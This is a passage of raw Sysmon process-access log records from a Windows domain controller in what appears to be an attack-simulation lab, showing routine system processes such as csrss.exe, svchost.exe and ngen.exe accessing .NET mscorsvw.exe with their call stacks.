l.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007961Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:33.649{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-464D-6000-C303-000000009A01}3728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007960Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:33.649{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464D-6000-C303-000000009A01}3728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007983Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:34.649{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464E-6000-CA03-000000009A01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007982Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:34.634{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-464E-6000-CA03-000000009A01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007981Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:34.634{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464E-6000-CA03-000000009A01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007980Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:34.571{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464E-6000-C903-000000009A01}3976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007979Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:34.555{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-464E-6000-C903-000000009A01}3976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007978Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:34.555{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464E-6000-C903-000000009A01}3976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007977Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:34.462{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464E-6000-C803-000000009A01}3676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007976Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:34.446{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-464E-6000-C803-000000009A01}3676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007975Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:34.446{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464E-6000-C803-000000009A01}3676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007974Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:34.384{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464E-6000-C703-000000009A01}4168C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007973Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:34.368{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-464E-6000-C703-000000009A01}4168C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007972Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:34.368{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464E-6000-C703-000000009A01}4168C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007971Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:34.024{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464E-6000-C603-000000009A01}2192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007970Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:34.009{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-464E-6000-C603-000000009A01}2192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007969Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:34.009{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464E-6000-C603-000000009A01}2192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008003Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.977{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-464F-6000-D103-000000009A01}1292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008002Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.977{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464F-6000-D103-000000009A01}1292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008001Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.931{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464F-6000-D003-000000009A01}1360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008000Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.915{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-464F-6000-D003-000000009A01}1360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007999Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.915{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464F-6000-D003-000000009A01}1360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007998Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:35.852{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464F-6000-CF03-000000009A01}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007997Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 